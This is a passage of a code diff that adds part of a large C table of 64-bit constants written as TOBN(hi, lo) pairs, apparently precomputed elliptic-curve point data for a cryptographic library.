+     TOBN(0xe9f9669c, 0xda94951e), TOBN(0x4b6af58d, 0x66b8d418),
+     TOBN(0xfa321074, 0x17d426a4), TOBN(0xc78e66a9, 0x9dde6027),
+     TOBN(0x0516c083, 0x4a53b964), TOBN(0xfc659d38, 0xff602330),
+     TOBN(0x0ab55e5c, 0x58c5c897), TOBN(0x985099b2, 0x838bc5df),
+     TOBN(0x061d9efc, 0xc52fc238), TOBN(0x712b2728, 0x6ac1da3f),
+     TOBN(0xfb658149, 0x9283fe08), TOBN(0x4954ac94, 0xb8aaa2f7),
+     TOBN(0x85c0ada4, 0x7fb2e74f), TOBN(0xee8ba98e, 0xb89926b0),
+     TOBN(0xe4f9d37d, 0x23d1af5b), TOBN(0x14ccdbf9, 0xba9b015e),
+     TOBN(0xb674481b, 0x7bfe7178), TOBN(0x4e1debae, 0x65405868),
+     TOBN(0x061b2821, 0xc48c867d), TOBN(0x69c15b35, 0x513b30ea),
+     TOBN(0x3b4a1666, 0x36871088), TOBN(0xe5e29f5d, 0x1220b1ff),
+     TOBN(0x4b82bb35, 0x233d9f4d), TOBN(0x4e076333, 0x18cdc675)}
+    ,
+    {TOBN(0x0d53f5c7, 0xa3e6fced), TOBN(0xe8cbbdd5, 0xf45fbdeb),
+     TOBN(0xf85c01df, 0x13339a70), TOBN(0x0ff71880, 0x142ceb81),
+     TOBN(0x4c4e8774, 0xbd70437a), TOBN(0x5fb32891, 0xba0bda6a),
+     TOBN(0x1cdbebd2, 0xf18bd26e), TOBN(0x2f9526f1, 0x03a9d522),
+     TOBN(0x40ce3051, 0x92c4d684), TOBN(0x8b04d725, 0x7612efcd),
+     TOBN(0xb9dcda36, 0x6f9cae20), TOBN(0x0edc4d24, 0xf058856c),
+     TOBN(0x64f2e6bf, 0x85427900), TOBN(0x3de81295, 0xdc09dfea),
+     TOBN(0xd41b4487, 0x379bf26c), TOBN(0x50b62c6d, 0x6df135a9),
+     TOBN(0xd4f8e3b4, 0xc72dfe67), TOBN(0xc416b0f6, 0x90e19fdf),
+     TOBN(0x18b9098d, 0x4c13bd35), TOBN(0xac11118a, 0x15b8cb9e),
+     TOBN(0xf598a318, 0xf0062841), TOBN(0xbfe0602f, 0x89f356f4),
+     TOBN(0x7ae3637e, 0x30177a0c), TOBN(0x34097747, 0x61136537),
+     TOBN(0x0db2fb5e, 0xd005832a), TOBN(0x5f5efd3b, 0x91042e4f),
+     TOBN(0x8c4ffdc6, 0xed70f8ca), TOBN(0xe4645d0b, 0xb52da9cc),
+     TOBN(0x9596f58b, 0xc9001d1f), TOBN(0x52c8f0bc, 0x4e117205),
+     TOBN(0xfd4aa0d2, 0xe398a084), TOBN(0x815bfe3a, 0x104f49de),
+     TOBN(0x97e5443f, 0x23885e5f), TOBN(0xf72f8f99, 0xe8433aab),
+     TOBN(0xbd00b154, 0xe4d4e604), TOBN(0xd0b35e6a, 0xe5e173ff),
+     TOBN(0x57b2a048, 0x9164722d), TOBN(0x3e3c665b, 0x88761ec8),
+     TOBN(0x6bdd1397, 0x3da83832), TOBN(0x3c8b1a1e, 0x73dafe3b),
+     TOBN(0x4497ace6, 0x54317cac), TOBN(0xbe600ab9, 0x521771b3),
+     TOBN(0xb42e409e, 0xb0dfe8b8), TOBN(0x386a67d7, 0x3942310f),
+     TOBN(0x25548d8d, 0x4431cc28), TOBN(0xa7cff142, 0x985dc524),
+     TOBN(0x4d60f5a1, 0x93c4be32), TOBN(0x83ebd5c8, 0xd071c6e1),
+     TOBN(0xba3a80a7, 0xb1fd2b0b), TOBN(0x9b3ad396, 0x5bec33e8),
+     TOBN(0xb3868d61, 0x79743fb3), TOBN(0xcfd169fc, 0xfdb462fa),
+     TOBN(0xd3b499d7, 0x9ce0a6af), TOBN(0x55dc1cf1, 0xe42d3ff8),
+     TOBN(0x04fb9e6c, 0xc6c3e1b2), TOBN(0x47e6961d, 0x6f69a474),
+     TOBN(0x54eb3acc, 0xe548b37b), TOBN(0xb38e7542, 0x84d40549),
+     TOBN(0x8c3daa51, 0x7b341b4f), TOBN(0x2f6928ec, 0x690bf7fa),
+     TOBN(0x0496b323, 0x86ce6c41), TOBN(0x01be1c55, 0x10adadcd),
+     TOBN(0xc04e67e7, 0x4bb5faf9), TOBN(0x3cbaf678, 0xe15c9985),
+     TOBN(0x8cd12145, 0x50ca4247), TOBN(0xba1aa47a, 0xe7dd30aa),
+     TOBN(0x2f81ddf1, 0xe58fee24), TOBN(0x03452936, 0xeec9b0e8),
+     TOBN(0x8bdc3b81, 0x243aea96), TOBN(0x9a2919af, 0x15c3d0e5),
+     TOBN(0x9ea640ec, 0x10948361), TOBN(0x5ac86d5b, 0x6e0bcccf),
+     TOBN(0xf892d918, 0xc36cf440), TOBN(0xaed3e837, 0xc939719c),
+     TOBN(0xb07b08d2, 0xc0218b64), TOBN(0x6f1bcbba, 0xce9790dd),
+     TOBN(0x4a84d6ed, 0x60919b8e), TOBN(0xd8900791, 0x8ac1f9eb),
+     TOBN(0xf84941aa, 0x0dd5daef), TOBN(0xb22fe40a, 0x67fd62c5),
+     TOBN(0x97e15ba2, 0x157f2db3), TOBN(0xbda2fc8f, 0x8e28ca9c),
+     TOBN(0x5d050da4, 0x37b9f454), TOBN(0x3d57eb57, 0x2379d72e),
+     TOBN(0xe9b5eba2, 0xfb5ee997), TOBN(0x01648ca2, 0xe11538ca),
+     TOBN(0x32bb76f6, 0xf6327974), TOBN(0x338f14b8, 0xff3f4bb7),
+     TOBN(0x524d226a, 0xd7ab9a2d), TOBN(0x9c00090d, 0x7dfae958),
+     TOBN(0x0ba5f539, 0x8751d8c2), TOBN(0x8afcbcdd, 0x3ab8262d),
+     TOBN(0x57392729, 0xe99d043b), TOBN(0xef51263b, 0xaebc943a),
+     TOBN(0x9feace93, 0x20862935), TOBN(0x639efc03, 0xb06c817b),
+     TOBN(0x1fe054b3, 0x66b4be7a), TOBN(0x3f25a9de, 0x84a37a1e),
+     TOBN(0xf39ef1ad, 0x78d75cd9), TOBN(0xd7b58f49, 0x5062c1b5),
+     TOBN(0x6f74f9a9, 0xff563436), TOBN(0xf718ff29, 0xe8af51e7),
+     TOBN(0x5234d313, 0x15e97fec), TOBN(0xb6a8e2b1, 0x292f1c0a),
+     TOBN(0xa7f53aa8, 0x327720c1), TOBN(0x956ca322, 0xba092cc8),
+     TOBN(0x8f03d64a, 0x28746c4d), TOBN(0x51fe1782, 0x66d0d392),
+     TOBN(0xd19b34db, 0x3c832c80), TOBN(0x60dccc5c, 0x6da2e3b4),
+     TOBN(0x245dd62e, 0x0a104ccc), TOBN(0xa7ab1de1, 0x620b21fd),
+     TOBN(0xb293ae0b, 0x3893d123), TOBN(0xf7b75783, 0xb15ee71c),
+     TOBN(0x5aa3c614, 0x42a9468b), TOBN(0xd686123c, 0xdb15d744),
+     TOBN(0x8c616891, 0xa7ab4116), TOBN(0x6fcd72c8, 0xa4e6a459),
+     TOBN(0xac219110, 0x77e5fad7), TOBN(0xfb6a20e7, 0x704fa46b),
+     TOBN(0xe839be7d, 0x341d81dc), TOBN(0xcddb6889, 0x32148379),
+     TOBN(0xda6211a1, 0xf7026ead), TOBN(0xf3b2575f, 0xf4d1cc5e),
+     TOBN(0x40cfc8f6, 0xa7a73ae6), TOBN(0x83879a5e, 0x61d5b483),
+     TOBN(0xc5acb1ed, 0x41a50ebc), TOBN(0x59a60cc8, 0x3c07d8fa),
+     TOBN(0x1b73bdce, 0xb1876262), TOBN(0x2b0d79f0, 0x12af4ee9),
+     TOBN(0x8bcf3b0b, 0xd46e1d07), TOBN(0x17d6af9d, 0xe45d152f),
+     TOBN(0x73520461, 0x6d736451), TOBN(0x43cbbd97, 0x56b0bf5a),
+     TOBN(0xb0833a5b, 0xd5999b9d), TOBN(0x702614f0, 0xeb72e398),
+     TOBN(0x0aadf01a, 0x59c3e9f8), TOBN(0x40200e77, 0xce6b3d16),
+     TOBN(0xda22bdd3, 0xdeddafad), TOBN(0x76dedaf4, 0x310d72e1),
+     TOBN(0x49ef807c, 0x4bc2e88f), TOBN(0x6ba81291, 0x146dd5a5),
+     TOBN(0xa1a4077a, 0x7d8d59e9), TOBN(0x87b6a2e7, 0x802db349),
+     TOBN(0xd5679997, 0x1b4e598e), TOBN(0xf499ef1f, 0x06fe4b1d),
+     TOBN(0x3978d3ae, 0xfcb267c5), TOBN(0xb582b557, 0x235786d0),
+     TOBN(0x32b3b2ca, 0x1715cb07), TOBN(0x4c3de6a2, 0x8480241d),
+     TOBN(0x63b5ffed, 0xcb571ecd), TOBN(0xeaf53900, 0xed2fe9a9),
+     TOBN(0xdec98d4a, 0xc3b81990), TOBN(0x1cb83722, 0x9e0cc8fe),
+     TOBN(0xfe0b0491, 0xd2b427b9), TOBN(0x0f2386ac, 0xe983a66c),
+     TOBN(0x930c4d1e, 0xb3291213), TOBN(0xa2f82b2e, 0x59a62ae4),
+     TOBN(0x77233853, 0xf93e89e3), TOBN(0x7f8063ac, 0x11777c7f),
+     TOBN(0xff0eb567, 0x59ad2877), TOBN(0x6f454642, 0x9865c754),
+     TOBN(0xe6fe701a, 0x236e9a84), TOBN(0xc586ef16, 0x06e40fc3),
+     TOBN(0x3f62b6e0, 0x24bafad9), TOBN(0xc8b42bd2, 0x64da906a),
+     TOBN(0xc98e1eb4, 0xda3276a0), TOBN(0x30d0e5fc, 0x06cbf852),
+     TOBN(0x1b6b2ae1, 0xe8b4dfd4), TOBN(0xd754d5c7, 0x8301cbac),
+     TOBN(0x66097629, 0x112a39ac), TOBN(0xf86b5999, 0x93ba4ab9),
+     TOBN(0x26c9dea7, 0x99f9d581), TOBN(0x0473b1a8, 0xc2fafeaa),
+     TOBN(0x1469af55, 0x3b2505a5), TOBN(0x227d16d7, 0xd6a43323),
+     TOBN(0x3316f73c, 0xad3d97f9), TOBN(0x52bf3bb5, 0x1f137455),
+     TOBN(0x953eafeb, 0x09954e7c), TOBN(0xa721dfed, 0xdd732411),
+     TOBN(0xb4929821, 0x141d4579), TOBN(0x3411321c, 0xaa3bd435),
+     TOBN(0xafb355aa, 0x17fa6015), TOBN(0xb4e7ef4a, 0x18e42f0e),
+     TOBN(0x604ac97c, 0x59371000), TOBN(0xe1c48c70, 0x7f759c18),
+     TOBN(0x3f62ecc5, 0xa5db6b65), TOBN(0x0a78b173, 0x38a21495),
+     TOBN(0x6be1819d, 0xbcc8ad94), TOBN(0x70dc04f6, 0xd89c3400),
+     TOBN(0x462557b4, 0xa6b4840a), TOBN(0x544c6ade, 0x60bd21c0),
+     TOBN(0x6a00f24e, 0x907a544b), TOBN(0xa7520dcb, 0x313da210),
+     TOBN(0xfe939b75, 0x11e4994b), TOBN(0x918b6ba6, 0xbc275d70),
+     TOBN(0xd3e5e0fc, 0x644be892), TOBN(0x707a9816, 0xfdaf6c42),
+     TOBN(0x60145567, 0xf15c13fe), TOBN(0x4818ebaa, 0xe130a54a),
+     TOBN(0x28aad3ad, 0x58d2f767), TOBN(0xdc5267fd, 0xd7e7c773),
+     TOBN(0x4919cc88, 0xc3afcc98), TOBN(0xaa2e6ab0, 0x2db8cd4b),
+     TOBN(0xd46fec04, 0xd0c63eaa), TOBN(0xa1cb92c5, 0x19ffa832),
+     TOBN(0x678dd178, 0xe43a631f), TOBN(0xfb5ae1cd, 0x3dc788b3),
+     TOBN(0x68b4fb90, 0x6e77de04), TOBN(0x7992bcf0, 0xf06dbb97),
+     TOBN(0x896e6a13, 0xc417c01d), TOBN(0x8d96332c, 0xb956be01),
+     TOBN(0x902fc93a, 0x413aa2b9), TOBN(0x99a4d915, 0xfc98c8a5),
+     TOBN(0x52c29407, 0x565f1137), TOBN(0x4072690f, 0x21e4f281),
+     TOBN(0x36e607cf, 0x02ff6072), TOBN(0xa47d2ca9, 0x8ad98cdc),
+     TOBN(0xbf471d1e, 0xf5f56609), TOBN(0xbcf86623, 0xf264ada0),
+     TOBN(0xb70c0687, 0xaa9e5cb6), TOBN(0xc98124f2, 0x17401c6c),
+     TOBN(0x8189635f, 0xd4a61435), TOBN(0xd28fb8af, 0xa9d98ea6),
+     TOBN(0xb9a67c2a, 0x40c251f8), TOBN(0x88cd5d87, 0xa2da44be),
+     TOBN(0x437deb96, 0xe09b5423), TOBN(0x150467db, 0x64287dc1),
+     TOBN(0xe161debb, 0xcdabb839), TOBN(0xa79e9742, 0xf1839a3e),
+     TOBN(0xbb8dd3c2, 0x652d202b), TOBN(0x7b3e67f7, 0xe9f97d96),
+     TOBN(0x5aa5d78f, 0xb1cb6ac9), TOBN(0xffa13e8e, 0xca1d0d45),
+     TOBN(0x369295dd, 0x2ba5bf95), TOBN(0xd68bd1f8, 0x39aff05e),
+     TOBN(0xaf0d86f9, 0x26d783f2), TOBN(0x543a59b3, 0xfc3aafc1),
+     TOBN(0x3fcf81d2, 0x7b7da97c), TOBN(0xc990a056, 0xd25dee46),
+     TOBN(0x3e6775b8, 0x519cce2c), TOBN(0xfc9af71f, 0xae13d863),
+     TOBN(0x774a4a6f, 0x47c1605c), TOBN(0x46ba4245, 0x2fd205e8),
+     TOBN(0xa06feea4, 0xd3fd524d), TOBN(0x1e724641, 0x6de1acc2),
+     TOBN(0xf53816f1, 0x334e2b42), TOBN(0x49e5918e, 0x922f0024),
+     TOBN(0x439530b6, 0x65c7322d), TOBN(0xcf12cc01, 0xb3c1b3fb),
+     TOBN(0xc70b0186, 0x0172f685), TOBN(0xb915ee22, 0x1b58391d),
+     TOBN(0x9afdf03b, 0xa317db24), TOBN(0x87dec659, 0x17b8ffc4),
+     TOBN(0x7f46597b, 0xe4d3d050), TOBN(0x80a1c1ed, 0x006500e7),
+     TOBN(0x84902a96, 0x78bf030e), TOBN(0xfb5e9c9a, 0x50560148),
+     TOBN(0x6dae0a92, 0x63362426), TOBN(0xdcaeecf4, 0xa9e30c40),
+     TOBN(0xc0d887bb, 0x518d0c6b), TOBN(0x99181152, 0xcb985b9d),
+     TOBN(0xad186898, 0xef7bc381), TOBN(0x18168ffb, 0x9ee46201),
+     TOBN(0x9a04cdaa, 0x2502753c), TOBN(0xbb279e26, 0x51407c41),
+     TOBN(0xeacb03aa, 0xf23564e5), TOBN(0x18336582, 0x71e61016),
+     TOBN(0x8684b8c4, 0xeb809877), TOBN(0xb336e18d, 0xea0e672e),
+     TOBN(0xefb601f0, 0x34ee5867), TOBN(0x2733edbe, 0x1341cfd1),
+     TOBN(0xb15e809a, 0x26025c3c), TOBN(0xe6e981a6, 0x9350df88),
+     TOBN(0x92376237, 0x8502fd8e), TOBN(0x4791f216, 0x0c12be9b),
+     TOBN(0xb7256789, 0x25f02425), TOBN(0xec863194, 0x7a974443),
+     TOBN(0x7c0ce882, 0xfb41cc52), TOBN(0xc266ff7e, 0xf25c07f2),
+     TOBN(0x3d4da8c3, 0x017025f3), TOBN(0xefcf628c, 0xfb9579b4),
+     TOBN(0x5c4d0016, 0x1f3716ec), TOBN(0x9c27ebc4, 0x6801116e),
+     TOBN(0x5eba0ea1, 0x1da1767e), TOBN(0xfe151452, 0x47004c57),
+     TOBN(0x3ace6df6, 0x8c2373b7), TOBN(0x75c3dffe, 0x5dbc37ac),
+     TOBN(0x3dc32a73, 0xddc925fc), TOBN(0xb679c841, 0x2f65ee0b),
+     TOBN(0x715a3295, 0x451cbfeb), TOBN(0xd9889768, 0xf76e9a29),
+     TOBN(0xec20ce7f, 0xb28ad247), TOBN(0xe99146c4, 0x00894d79),
+     TOBN(0x71457d7c, 0x9f5e3ea7), TOBN(0x097b2662, 0x38030031),
+     TOBN(0xdb7f6ae6, 0xcf9f82a8), TOBN(0x319decb9, 0x438f473a),
+     TOBN(0xa63ab386, 0x283856c3), TOBN(0x13e3172f, 0xb06a361b),
+     TOBN(0x2959f8dc, 0x7d5a006c), TOBN(0x2dbc27c6, 0x75fba752),
+     TOBN(0xc1227ab2, 0x87c22c9e), TOBN(0x06f61f75, 0x71a268b2),
+     TOBN(0x1b6bb971, 0x04779ce2), TOBN(0xaca83812, 0x0aadcb1d),
+     TOBN(0x297ae0bc, 0xaeaab2d5), TOBN(0xa5c14ee7, 0x5bfb9f13),
+     TOBN(0xaa00c583, 0xf17a62c7), TOBN(0x39eb962c, 0x173759f6),
+     TOBN(0x1eeba1d4, 0x86c9a88f), TOBN(0x0ab6c37a, 0xdf016c5e),
+     TOBN(0xa2a147db, 0xa28a0749), TOBN(0x246c20d6, 0xee519165),
+     TOBN(0x5068d1b1, 0xd3810715), TOBN(0xb1e7018c, 0x748160b9),
+     TOBN(0x03f5b1fa, 0xf380ff62), TOBN(0xef7fb1dd, 0xf3cb2c1e),
+     TOBN(0xeab539a8, 0xfc91a7da), TOBN(0x83ddb707, 0xf3f9b561),
+     TOBN(0xc550e211, 0xfe7df7a4), TOBN(0xa7cd07f2, 0x063f6f40),
+     TOBN(0xb0de3635, 0x2976879c), TOBN(0xb5f83f85, 0xe55741da),
+     TOBN(0x4ea9d25e, 0xf3d8ac3d), TOBN(0x6fe2066f, 0x62819f02),
+     TOBN(0x4ab2b9c2, 0xcef4a564), TOBN(0x1e155d96, 0x5ffa2de3),
+     TOBN(0x0eb0a19b, 0xc3a72d00), TOBN(0x4037665b, 0x8513c31b),
+     TOBN(0x2fb2b6bf, 0x04c64637), TOBN(0x45c34d6e, 0x08cdc639),
+     TOBN(0x56f1e10f, 0xf01fd796), TOBN(0x4dfb8101, 0xfe3667b8),
+     TOBN(0xe0eda253, 0x9021d0c0), TOBN(0x7a94e9ff, 0x8a06c6ab),
+     TOBN(0x2d3bb0d9, 0xbb9aa882), TOBN(0xea20e4e5, 0xec05fd10),
+     TOBN(0xed7eeb5f, 0x1a1ca64e), TOBN(0x2fa6b43c, 0xc6327cbd),
+     TOBN(0xb577e3cf, 0x3aa91121), TOBN(0x8c6bd5ea, 0x3a34079b),
+     TOBN(0xd7e5ba39, 0x60e02fc0), TOBN(0xf16dd2c3, 0x90141bf8),
+     TOBN(0xb57276d9, 0x80101b98), TOBN(0x760883fd, 0xb82f0f66),
+     TOBN(0x89d7de75, 0x4bc3eff3), TOBN(0x03b60643, 0x5dc2ab40),
+     TOBN(0xcd6e53df, 0xe05beeac), TOBN(0xf2f1e862, 0xbc3325cd),
+     TOBN(0xdd0f7921, 0x774f03c3), TOBN(0x97ca7221, 0x4552cc1b),
+     TOBN(0x5a0d6afe, 0x1cd19f72), TOBN(0xa20915dc, 0xf183fbeb),
+     TOBN(0x9fda4b40, 0x832c403c), TOBN(0x32738edd, 0xbe425442),
+     TOBN(0x469a1df6, 0xb5eccf1a), TOBN(0x4b5aff42, 0x28bbe1f0),
+     TOBN(0x31359d7f, 0x570dfc93), TOBN(0xa18be235, 0xf0088628),
+     TOBN(0xa5b30fba, 0xb00ed3a9), TOBN(0x34c61374, 0x73cdf8be),
+     TOBN(0x2c5c5f46, 0xabc56797), TOBN(0x5cecf93d, 0xb82a8ae2),
+     TOBN(0x7d3dbe41, 0xa968fbf0), TOBN(0xd23d4583, 0x1a5c7f3d),
+     TOBN(0xf28f69a0, 0xc087a9c7), TOBN(0xc2d75471, 0x474471ca),
+     TOBN(0x36ec9f4a, 0x4eb732ec), TOBN(0x6c943bbd, 0xb1ca6bed),
+     TOBN(0xd64535e1, 0xf2457892), TOBN(0x8b84a8ea, 0xf7e2ac06),
+     TOBN(0xe0936cd3, 0x2499dd5f), TOBN(0x12053d7e, 0x0ed04e57),
+     TOBN(0x4bdd0076, 0xe4305d9d), TOBN(0x34a527b9, 0x1f67f0a2),
+     TOBN(0xe79a4af0, 0x9cec46ea), TOBN(0xb15347a1, 0x658b9bc7),
+     TOBN(0x6bd2796f, 0x35af2f75), TOBN(0xac957990, 0x4051c435),
+     TOBN(0x2669dda3, 0xc33a655d), TOBN(0x5d503c2e, 0x88514aa3),
+     TOBN(0xdfa11337, 0x3753dd41), TOBN(0x3f054673, 0x0b754f78),
+     TOBN(0xbf185677, 0x496125bd), TOBN(0xfb0023c8, 0x3775006c),
+     TOBN(0xfa0f072f, 0x3a037899), TOBN(0x4222b6eb, 0x0e4aea57),
+     TOBN(0x3dde5e76, 0x7866d25a), TOBN(0xb6eb04f8, 0x4837aa6f),
+     TOBN(0x5315591a, 0x2cf1cdb8), TOBN(0x6dfb4f41, 0x2d4e683c),
+     TOBN(0x7e923ea4, 0x48ee1f3a), TOBN(0x9604d9f7, 0x05a2afd5),
+     TOBN(0xbe1d4a33, 0x40ea4948), TOBN(0x5b45f1f4, 0xb44cbd2f),
+     TOBN(0x5faf8376, 0x4acc757e), TOBN(0xa7cf9ab8, 0x63d68ff7),
+     TOBN(0x8ad62f69, 0xdf0e404b), TOBN(0xd65f33c2, 0x12bdafdf),
+     TOBN(0xc365de15, 0xa377b14e), TOBN(0x6bf5463b, 0x8e39f60c),
+     TOBN(0x62030d2d, 0x2ce68148), TOBN(0xd95867ef, 0xe6f843a8),
+     TOBN(0xd39a0244, 0xef5ab017), TOBN(0x0bd2d8c1, 0x4ab55d12),
+     TOBN(0xc9503db3, 0x41639169), TOBN(0x2d4e25b0, 0xf7660c8a),
+     TOBN(0x760cb3b5, 0xe224c5d7), TOBN(0xfa3baf8c, 0x68616919),
+     TOBN(0x9fbca113, 0x8d142552), TOBN(0x1ab18bf1, 0x7669ebf5),
+     TOBN(0x55e6f53e, 0x9bdf25dd), TOBN(0x04cc0bf3, 0xcb6cd154),
+     TOBN(0x595bef49, 0x95e89080), TOBN(0xfe9459a8, 0x104a9ac1),
+     TOBN(0xad2d89ca, 0xcce9bb32), TOBN(0xddea65e1, 0xf7de8285),
+     TOBN(0x62ed8c35, 0xb351bd4b), TOBN(0x4150ff36, 0x0c0e19a7),
+     TOBN(0x86e3c801, 0x345f4e47), TOBN(0x3bf21f71, 0x203a266c),
+     TOBN(0x7ae110d4, 0x855b1f13), TOBN(0x5d6aaf6a, 0x07262517),
+     TOBN(0x1e0f12e1, 0x813d28f1), TOBN(0x6000e11d, 0x7ad7a523),
+     TOBN(0xc7d8deef, 0xc744a17b), TOBN(0x1e990b48, 0x14c05a00),
+     TOBN(0x68fddaee, 0x93e976d5), TOBN(0x696241d1, 0x46610d63),
+     TOBN(0xb204e7c3, 0x893dda88), TOBN(0x8bccfa65, 0x6a3a6946),
+     TOBN(0xb59425b4, 0xc5cd1411), TOBN(0x701b4042, 0xff3658b1),
+     TOBN(0xe3e56bca, 0x4784cf93), TOBN(0x27de5f15, 0x8fe68d60),
+     TOBN(0x4ab9cfce, 0xf8d53f19), TOBN(0xddb10311, 0xa40a730d),
+     TOBN(0x6fa73cd1, 0x4eee0a8a), TOBN(0xfd548748, 0x5249719d),
+     TOBN(0x49d66316, 0xa8123ef0), TOBN(0x73c32db4, 0xe7f95438),
+     TOBN(0x2e2ed209, 0x0d9e7854), TOBN(0xf98a9329, 0x9d9f0507),
+     TOBN(0xc5d33cf6, 0x0c6aa20a), TOBN(0x9a32ba14, 0x75279bb2),
+     TOBN(0x7e3202cb, 0x774a7307), TOBN(0x64ed4bc4, 0xe8c42dbd),
+     TOBN(0xc20f1a06, 0xd4caed0d), TOBN(0xb8021407, 0x171d22b3),
+     TOBN(0xd426ca04, 0xd13268d7), TOBN(0x92377007, 0x25f4d126),
+     TOBN(0x4204cbc3, 0x71f21a85), TOBN(0x18461b7a, 0xf82369ba),
+     TOBN(0xc0c07d31, 0x3fc858f9), TOBN(0x5deb5a50, 0xe2bab569),
+     TOBN(0xd5959d46, 0xd5eea89e), TOBN(0xfdff8424, 0x08437f4b),
+     TOBN(0xf21071e4, 0x3cfe254f), TOBN(0x72417696, 0x95468321),
+     TOBN(0x5d8288b9, 0x102cae3e), TOBN(0x2d143e3d, 0xf1965dff),
+     TOBN(0x00c9a376, 0xa078d847), TOBN(0x6fc0da31, 0x26028731),
+     TOBN(0xa2baeadf, 0xe45083a2), TOBN(0x66bc7218, 0x5e5b4bcd),
+     TOBN(0x2c826442, 0xd04b8e7f), TOBN(0xc19f5451, 0x6c4b586b),
+     TOBN(0x60182c49, 0x5b7eeed5), TOBN(0xd9954ecd, 0x7aa9dfa1),
+     TOBN(0xa403a8ec, 0xc73884ad), TOBN(0x7fb17de2, 0x9bb39041),
+     TOBN(0x694b64c5, 0xabb020e8), TOBN(0x3d18c184, 0x19c4eec7),
+     TOBN(0x9c4673ef, 0x1c4793e5), TOBN(0xc7b8aeb5, 0x056092e6),
+     TOBN(0x3aa1ca43, 0xf0f8c16b), TOBN(0x224ed5ec, 0xd679b2f6),
+     TOBN(0x0d56eeaf, 0x55a205c9), TOBN(0xbfe115ba, 0x4b8e028b),
+     TOBN(0x97e60849, 0x3927f4fe), TOBN(0xf91fbf94, 0x759aa7c5),
+     TOBN(0x985af769, 0x6be90a51), TOBN(0xc1277b78, 0x78ccb823),
+     TOBN(0x395b656e, 0xe7a75952), TOBN(0x00df7de0, 0x928da5f5),
+     TOBN(0x09c23175, 0x4ca4454f), TOBN(0x4ec971f4, 0x7aa2d3c1),
+     TOBN(0x45c3c507, 0xe75d9ccc), TOBN(0x63b7be8a, 0x3dc90306),
+     TOBN(0x37e09c66, 0x5db44bdc), TOBN(0x50d60da1, 0x6841c6a2),
+     TOBN(0x6f9b65ee, 0x08df1b12), TOBN(0x38734879, 0x7ff089df),
+     TOBN(0x9c331a66, 0x3fe8013d), TOBN(0x017f5de9, 0x5f42fcc8),
+     TOBN(0x43077866, 0xe8e57567), TOBN(0xc9f781ce, 0xf9fcdb18),
+     TOBN(0x38131dda, 0x9b12e174), TOBN(0x25d84aa3, 0x8a03752a),
+     TOBN(0x45e09e09, 0x4d0c0ce2), TOBN(0x1564008b, 0x92bebba5),
+     TOBN(0xf7e8ad31, 0xa87284c7), TOBN(0xb7c4b46c, 0x97e7bbaa),
+     TOBN(0x3e22a7b3, 0x97acf4ec), TOBN(0x0426c400, 0x5ea8b640),
+     TOBN(0x5e3295a6, 0x4e969285), TOBN(0x22aabc59, 0xa6a45670),
+     TOBN(0xb929714c, 0x5f5942bc), TOBN(0x9a6168bd, 0xfa3182ed),
+     TOBN(0x2216a665, 0x104152ba), TOBN(0x46908d03, 0xb6926368)}
+    ,
+    {TOBN(0xa9f5d874, 0x5a1251fb), TOBN(0x967747a8, 0xc72725c7),
+     TOBN(0x195c33e5, 0x31ffe89e), TOBN(0x609d210f, 0xe964935e),
+     TOBN(0xcafd6ca8, 0x2fe12227), TOBN(0xaf9b5b96, 0x0426469d),
+     TOBN(0x2e9ee04c, 0x5693183c), TOBN(0x1084a333, 0xc8146fef),
+     TOBN(0x96649933, 0xaed1d1f7), TOBN(0x566eaff3, 0x50563090),
+     TOBN(0x345057f0, 0xad2e39cf), TOBN(0x148ff65b, 0x1f832124),
+     TOBN(0x042e89d4, 0xcf94cf0d), TOBN(0x319bec84, 0x520c58b3),
+     TOBN(0x2a267626, 0x5361aa0d), TOBN(0xc86fa302, 0x8fbc87ad),
+     TOBN(0xfc83d2ab, 0x5c8b06d5), TOBN(0xb1a785a2, 0xfe4eac46),
+     TOBN(0xb99315bc, 0x846f7779), TOBN(0xcf31d816, 0xef9ea505),
+     TOBN(0x2391fe6a, 0x15d7dc85), TOBN(0x2f132b04, 0xb4016b33),
+     TOBN(0x29547fe3, 0x181cb4c7), TOBN(0xdb66d8a6, 0x650155a1),
+     TOBN(0x6b66d7e1, 0xadc1696f), TOBN(0x98ebe593, 0x0acd72d0),
+     TOBN(0x65f24550, 0xcc1b7435), TOBN(0xce231393, 0xb4b9a5ec),
+     TOBN(0x234a22d4, 0xdb067df9), TOBN(0x98dda095, 0xcaff9b00),
+     TOBN(0x1bbc75a0, 0x6100c9c1), TOBN(0x1560a9c8, 0x939cf695),
+     TOBN(0xcf006d3e, 0x99e0925f), TOBN(0x2dd74a96, 0x6322375a),
+     TOBN(0xc58b446a, 0xb56af5ba), TOBN(0x50292683, 0xe0b9b4f1),
+     TOBN(0xe2c34cb4, 0x1aeaffa3), TOBN(0x8b17203f, 0x9b9587c1),
+     TOBN(0x6d559207, 0xead1350c), TOBN(0x2b66a215, 0xfb7f9604),
+     TOBN(0x0850325e, 0xfe51bf74), TOBN(0x9c4f579e, 0x5e460094),
+     TOBN(0x5c87b92a, 0x76da2f25), TOBN(0x889de4e0, 0x6febef33),
+     TOBN(0x6900ec06, 0x646083ce), TOBN(0xbe2a0335, 0xbfe12773),
+     TOBN(0xadd1da35, 0xc5344110), TOBN(0x757568b7, 0xb802cd20),
+     TOBN(0x75559779, 0x00f7e6c8), TOBN(0x38e8b94f, 0x0facd2f0),
+     TOBN(0xfea1f3af, 0x03fde375), TOBN(0x5e11a1d8, 0x75881dfc),
+     TOBN(0xb3a6b02e, 0xc1e2f2ef), TOBN(0x193d2bbb, 0xc605a6c5),
+     TOBN(0x325ffeee, 0x339a0b2d), TOBN(0x27b6a724, 0x9e0c8846),
+     TOBN(0xe4050f1c, 0xf1c367ca), TOBN(0x9bc85a9b, 0xc90fbc7d),
+     TOBN(0xa373c4a2, 0xe1a11032), TOBN(0xb64232b7, 0xad0393a9),
+     TOBN(0xf5577eb0, 0x167dad29), TOBN(0x1604f301, 0x94b78ab2),
+     TOBN(0x0baa94af, 0xe829348b), TOBN(0x77fbd8dd, 0x41654342),
+     TOBN(0xdab50ea5, 0xb964e39a), TOBN(0xd4c29e3c, 0xd0d3c76e),
+     TOBN(0x80dae67c, 0x56d11964), TOBN(0x7307a8bf, 0xe5ffcc2f),
+     TOBN(0x65bbc1aa, 0x91708c3b), TOBN(0xa151e62c, 0x28bf0eeb),
+     TOBN(0x6cb53381, 0x6fa34db7), TOBN(0x5139e05c, 0xa29403a8),
+     TOBN(0x6ff651b4, 0x94a7cd2e), TOBN(0x5671ffd1, 0x0699336c),
+     TOBN(0x6f5fd2cc, 0x979a896a), TOBN(0x11e893a8, 0xd8148cef),
